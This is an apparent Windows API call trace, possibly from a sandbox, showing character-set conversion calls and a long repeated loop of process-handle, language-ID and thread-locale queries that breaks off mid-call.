!\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0166.567] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\nmõs\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0166.567] GetLastError () returned 0x0 [0166.568] SetLastError (dwErrCode=0x0) [0166.568] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0166.568] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿﶘᆮ᫄JĀ") returned 256 [0166.568] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿﶘᆮ᫄JĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0166.568] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿﶘᆮ᫄JĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0166.568] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\nmõs\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0166.568] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49e61b) returned 0x0 [0166.568] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f2c10) returned 0x80 [0166.568] GetCurrentProcess () returned 0xffffffff [0166.585] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.586] GetSystemDefaultLangID () returned 0x26d0409 [0166.586] GetThreadLocale () returned 0x409 [0166.586] GetCurrentProcess () returned 0xffffffff [0166.586] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.586] GetSystemDefaultLangID () returned 0x26d0409 [0166.586] GetThreadLocale () returned 0x409 [0166.586] GetCurrentProcess () returned 0xffffffff [0166.586] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.586] GetSystemDefaultLangID () returned 0x26d0409 [0166.586] GetThreadLocale () returned 0x409 [0166.586] GetCurrentProcess () returned 0xffffffff [0166.586] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.586] GetSystemDefaultLangID () returned 0x26d0409 [0166.586] GetThreadLocale () returned 0x409 [0166.586] GetCurrentProcess () returned 0xffffffff [0166.586] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.586] GetSystemDefaultLangID () returned 0x26d0409 [0166.586] GetThreadLocale () returned 0x409 [0166.586] GetCurrentProcess () returned 0xffffffff [0166.586] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.587] GetSystemDefaultLangID () returned 0x26d0409 [0166.587] GetThreadLocale () returned 0x409 [0166.587] GetCurrentProcess () returned 0xffffffff [0166.587] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.587] GetSystemDefaultLangID () returned 0x26d0409 [0166.587] GetThreadLocale () returned 0x409 [0166.587] GetCurrentProcess () returned 0xffffffff [0166.587] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.587] GetSystemDefaultLangID () returned 0x26d0409 [0166.587] GetThreadLocale () returned 0x409 [0166.587] GetCurrentProcess () returned 0xffffffff [0166.587] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.587] GetSystemDefaultLangID () returned 0x26d0409 [0166.587] GetThreadLocale () returned 0x409 [0166.587] GetCurrentProcess () returned 0xffffffff [0166.587] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.587] GetSystemDefaultLangID () returned 0x26d0409 [0166.587] GetThreadLocale () returned 0x409 [0166.587] GetCurrentProcess () returned 0xffffffff [0166.587] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.587] GetSystemDefaultLangID () returned 0x26d0409 [0166.587] GetThreadLocale () returned 0x409 [0166.587] GetCurrentProcess () returned 0xffffffff [0166.587] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.587] GetSystemDefaultLangID () returned 0x26d0409 [0166.587] GetThreadLocale () returned 0x409 [0166.587] GetCurrentProcess () returned 0xffffffff [0166.588] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.588] GetSystemDefaultLangID () returned 0x26d0409 [0166.588] GetThreadLocale () returned 0x409 [0166.588] GetCurrentProcess () returned 0xffffffff [0166.588] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.588] GetSystemDefaultLangID () returned 0x26d0409 [0166.588] GetThreadLocale () returned 0x409 [0166.588] GetCurrentProcess () returned 0xffffffff [0166.588] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.588] GetSystemDefaultLangID () returned 0x26d0409 [0166.588] GetThreadLocale () returned 0x409 [0166.588] GetCurrentProcess () returned 0xffffffff [0166.588] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.588] GetSystemDefaultLangID () returned 0x26d0409 [0166.588] GetThreadLocale () returned 0x409 [0166.588] GetCurrentProcess () returned 0xffffffff [0166.588] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.588] GetSystemDefaultLangID () returned 0x26d0409 [0166.588] GetThreadLocale () returned 0x409 [0166.588] GetCurrentProcess () returned 0xffffffff [0166.588] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.588] GetSystemDefaultLangID () returned 0x26d0409 [0166.588] GetThreadLocale () returned 0x409 [0166.588] GetCurrentProcess () returned 0xffffffff [0166.588] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.588] GetSystemDefaultLangID () returned 0x26d0409 [0166.589] GetThreadLocale () returned 0x409 [0166.589] GetCurrentProcess () returned 0xffffffff [0166.589] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.589] GetSystemDefaultLangID () returned 0x26d0409 [0166.589] GetThreadLocale () returned 0x409 [0166.589] GetCurrentProcess () returned 0xffffffff [0166.589] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.589] GetSystemDefaultLangID () returned 0x26d0409 [0166.589] GetThreadLocale () returned 0x409 [0166.589] GetCurrentProcess () returned 0xffffffff [0166.589] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.589] GetSystemDefaultLangID () returned 0x26d0409 [0166.590] GetThreadLocale () returned 0x409 [0166.590] GetCurrentProcess () returned 0xffffffff [0166.590] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.590] GetSystemDefaultLangID () returned 0x26d0409 [0166.590] GetThreadLocale () returned 0x409 [0166.590] GetCurrentProcess () returned 0xffffffff [0166.590] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.590] GetSystemDefaultLangID () returned 0x26d0409 [0166.590] GetThreadLocale () returned 0x409 [0166.590] GetCurrentProcess () returned 0xffffffff [0166.590] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.590] GetSystemDefaultLangID () returned 0x26d0409 [0166.590] GetThreadLocale () returned 0x409 [0166.590] GetCurrentProcess () returned 0xffffffff [0166.590] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.590] GetSystemDefaultLangID () returned 0x26d0409 [0166.590] GetThreadLocale () returned 0x409 [0166.590] GetCurrentProcess () returned 0xffffffff [0166.590] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.590] GetSystemDefaultLangID () returned 0x26d0409 [0166.590] GetThreadLocale () returned 0x409 [0166.590] GetCurrentProcess () returned 0xffffffff [0166.591] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.591] GetSystemDefaultLangID () returned 0x26d0409 [0166.591] GetThreadLocale () returned 0x409 [0166.591] GetCurrentProcess () returned 0xffffffff [0166.591] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.591] GetSystemDefaultLangID () returned 0x26d0409 [0166.591] GetThreadLocale () returned 0x409 [0166.591] GetCurrentProcess () returned 0xffffffff [0166.591] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.591] GetSystemDefaultLangID () returned 0x26d0409 [0166.591] GetThreadLocale () returned 0x409 [0166.591] GetCurrentProcess () returned 0xffffffff [0166.591] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.591] GetSystemDefaultLangID () returned 0x26d0409 [0166.591] GetThreadLocale () returned 0x409 [0166.591] GetCurrentProcess () returned 0xffffffff [0166.591] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.591] GetSystemDefaultLangID () returned 0x26d0409 [0166.591] GetThreadLocale () returned 0x409 [0166.591] GetCurrentProcess () returned 0xffffffff [0166.591] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.591] GetSystemDefaultLangID () returned 0x26d0409 [0166.591] GetThreadLocale () returned 0x409 [0166.591] GetCurrentProcess () returned 0xffffffff [0166.591] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.591] GetSystemDefaultLangID () returned 0x26d0409 [0166.592] GetThreadLocale () returned 0x409 [0166.592] GetCurrentProcess () returned 0xffffffff [0166.592] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.592] GetSystemDefaultLangID () returned 0x26d0409 [0166.592] GetThreadLocale () returned 0x409 [0166.592] GetCurrentProcess () returned 0xffffffff [0166.592] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.592] GetSystemDefaultLangID () returned 0x26d0409 [0166.592] GetThreadLocale () returned 0x409 [0166.592] GetCurrentProcess () returned 0xffffffff [0166.592] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.592] GetSystemDefaultLangID () returned 0x26d0409 [0166.592] GetThreadLocale () returned 0x409 [0166.592] GetCurrentProcess () returned 0xffffffff [0166.592] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.592] GetSystemDefaultLangID () returned 0x26d0409 [0166.592] GetThreadLocale () returned 0x409 [0166.592] GetCurrentProcess () returned 0xffffffff [0166.592] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.592] GetSystemDefaultLangID () returned 0x26d0409 [0166.592] GetThreadLocale () returned 0x409 [0166.592] GetCurrentProcess () returned 0xffffffff [0166.592] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.592] GetSystemDefaultLangID () returned 0x26d0409 [0166.592] GetThreadLocale () returned 0x409 [0166.592] GetCurrentProcess () returned 0xffffffff [0166.593] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.593] GetSystemDefaultLangID () returned 0x26d0409 [0166.593] GetThreadLocale () returned 0x409 [0166.593] GetCurrentProcess () returned 0xffffffff [0166.593] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.593] GetSystemDefaultLangID () returned 0x26d0409 [0166.593] GetThreadLocale () returned 0x409 [0166.593] GetCurrentProcess () returned 0xffffffff [0166.593] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.593] GetSystemDefaultLangID () returned 0x26d0409 [0166.593] GetThreadLocale () returned 0x409 [0166.593] GetCurrentProcess () returned 0xffffffff [0166.593] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.593] GetSystemDefaultLangID () returned 0x26d0409 [0166.593] GetThreadLocale () returned 0x409 [0166.593] GetCurrentProcess () returned 0xffffffff [0166.593] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.593] GetSystemDefaultLangID () returned 0x26d0409 [0166.593] GetThreadLocale () returned 0x409 [0166.593] GetCurrentProcess () returned 0xffffffff [0166.593] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.593] GetSystemDefaultLangID () returned 0x26d0409 [0166.593] GetThreadLocale () returned 0x409 [0166.593] GetCurrentProcess () returned 0xffffffff [0166.593] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.594] GetSystemDefaultLangID () returned 0x26d0409 [0166.594] GetThreadLocale () returned 0x409 [0166.594] GetCurrentProcess () returned 0xffffffff [0166.594] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.594] GetSystemDefaultLangID () returned 0x26d0409 [0166.594] GetThreadLocale () returned 0x409 [0166.594] GetCurrentProcess () returned 0xffffffff [0166.594] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.594] GetSystemDefaultLangID () returned 0x26d0409 [0166.594] GetThreadLocale () returned 0x409 [0166.594] GetCurrentProcess () returned 0xffffffff [0166.594] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.594] GetSystemDefaultLangID () returned 0x26d0409 [0166.594] GetThreadLocale () returned 0x409 [0166.594] GetCurrentProcess () returned 0xffffffff [0166.594] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.594] GetSystemDefaultLangID () returned 0x26d0409 [0166.594] GetThreadLocale () returned 0x409 [0166.594] GetCurrentProcess () returned 0xffffffff [0166.594] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.594] GetSystemDefaultLangID () returned 0x26d0409 [0166.594] GetThreadLocale () returned 0x409 [0166.594] GetCurrentProcess () returned 0xffffffff [0166.594] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.594] GetSystemDefaultLangID () returned 0x26d0409 [0166.594] GetThreadLocale () returned 0x409 [0166.595] GetCurrentProcess () returned 0xffffffff [0166.595] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.595] GetSystemDefaultLangID () returned 0x26d0409 [0166.595] GetThreadLocale () returned 0x409 [0166.595] GetCurrentProcess () returned 0xffffffff [0166.595] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.595] GetSystemDefaultLangID () returned 0x26d0409 [0166.595] GetThreadLocale () returned 0x409 [0166.595] GetCurrentProcess () returned 0xffffffff [0166.595] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.595] GetSystemDefaultLangID () returned 0x26d0409 [0166.595] GetThreadLocale () returned 0x409 [0166.595] GetCurrentProcess () returned 0xffffffff [0166.595] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.595] GetSystemDefaultLangID () returned 0x26d0409 [0166.595] GetThreadLocale () returned 0x409 [0166.595] GetCurrentProcess () returned 0xffffffff [0166.595] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.595] GetSystemDefaultLangID () returned 0x26d0409 [0166.595] GetThreadLocale () returned 0x409 [0166.595] GetCurrentProcess () returned 0xffffffff [0166.595] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.595] GetSystemDefaultLangID () returned 0x26d0409 [0166.595] GetThreadLocale () returned 0x409 [0166.595] GetCurrentProcess () returned 0xffffffff [0166.595] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.596] GetSystemDefaultLangID () returned 0x26d0409 [0166.596] GetThreadLocale () returned 0x409 [0166.596] GetCurrentProcess () returned 0xffffffff [0166.596] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.596] GetSystemDefaultLangID () returned 0x26d0409 [0166.596] GetThreadLocale () returned 0x409 [0166.596] GetCurrentProcess () returned 0xffffffff [0166.596] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.596] GetSystemDefaultLangID () returned 0x26d0409 [0166.596] GetThreadLocale () returned 0x409 [0166.596] GetCurrentProcess () returned 0xffffffff [0166.596] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.596] GetSystemDefaultLangID () returned 0x26d0409 [0166.596] GetThreadLocale () returned 0x409 [0166.596] GetCurrentProcess () returned 0xffffffff [0166.596] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.596] GetSystemDefaultLangID () returned 0x26d0409 [0166.596] GetThreadLocale () returned 0x409 [0166.596] GetCurrentProcess () returned 0xffffffff [0166.596] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.596] GetSystemDefaultLangID () returned 0x26d0409 [0166.596] GetThreadLocale () returned 0x409 [0166.596] GetCurrentProcess () returned 0xffffffff [0166.596] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.596] GetSystemDefaultLangID () returned 0x26d0409 [0166.597] GetThreadLocale () returned 0x409 [0166.597] GetCurrentProcess () returned 0xffffffff [0166.597] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.597] GetSystemDefaultLangID () returned 